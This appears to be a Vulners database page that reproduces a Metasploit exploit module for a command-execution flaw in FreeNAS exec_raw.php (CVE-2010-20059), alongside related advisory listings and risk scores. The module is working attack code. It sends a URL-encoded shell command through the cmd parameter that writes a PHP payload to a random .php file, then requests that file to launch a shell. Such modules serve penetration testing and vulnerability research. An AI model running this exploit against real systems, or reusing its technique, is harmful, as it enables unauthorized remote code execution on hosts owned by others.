Lucene search
+L

FreeNAS exec_raw.php Arbitrary Command Execution

🗓️ 06 Nov 2010 00:00:00Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 18 Views

FreeNAS exec_raw.php Arbitrary Command Execution in version 0.7.2 < rev.554

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2010-20059
20 Aug 202515:35
attackerkb
circl
Circl
CVE-2010-20059
29 May 201815:50
circl
cnnvd
CNNVD
iXsystems FreeNAS 安全漏洞
20 Aug 202500:00
cnnvd
cve
CVE
CVE-2010-20059
20 Aug 202515:35
cve
cvelist
Cvelist
CVE-2010-20059 FreeNAS < 0.7.2 rev 5543 exec_raw.php Arbitrary Command Execution
20 Aug 202515:35
cvelist
euvd
EUVD
EUVD-2010-5304
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-20059
20 Aug 202516:15
nvd
openvas
OpenVAS
FreeNAS Remote Shell Command Execution Vulnerability
19 Nov 201000:00
openvas
ptsecurity
Positive Technologies
PT-2025-34099 · Undefined · Undefined
20 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2010-20059
22 Aug 202516:35
redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FreeNAS exec_raw.php Arbitrary Command Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution flaw
          in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL
          to the exec_raw.php page, an attacker may be able to execute arbitrary
          commands.

          NOTE: This module works best with php/meterpreter payloads.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-20059' ],
          [ 'OSVDB', '94441' ],
          [ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ]
        ],
        'Payload' => {
          'Space' => 6144,
          'DisableNops' => true,
          'BadChars' => "`\"' %&x",
        },
        'Targets' => [
          [ 'Automatic Target', {} ]
        ],
        'Privileged' => true,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'DisclosureDate' => '2010-11-06',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def exploit
    page = rand_text_alpha_upper(rand(5) + 1) + ".php"

    shellcode = payload.encoded

    sploit = "echo \"<?php\n#{shellcode}\n?>\" > #{page}"

    print_status("Sending exploit page '#{page}'")

    res = send_request_raw(
      {
        'uri'	=> "/exec_raw.php?cmd=" + Rex::Text.uri_encode(sploit),
      }, 10
    )

    if (res and res.code == 200)
      print_status("Triggering payload...")
      send_request_raw({ 'uri' => "/#{page}" }, 5)
      handler
    else
      print_error("Exploit failed")
      return
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Nov 2010 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 49.3
EPSS0.01022
SSVC
18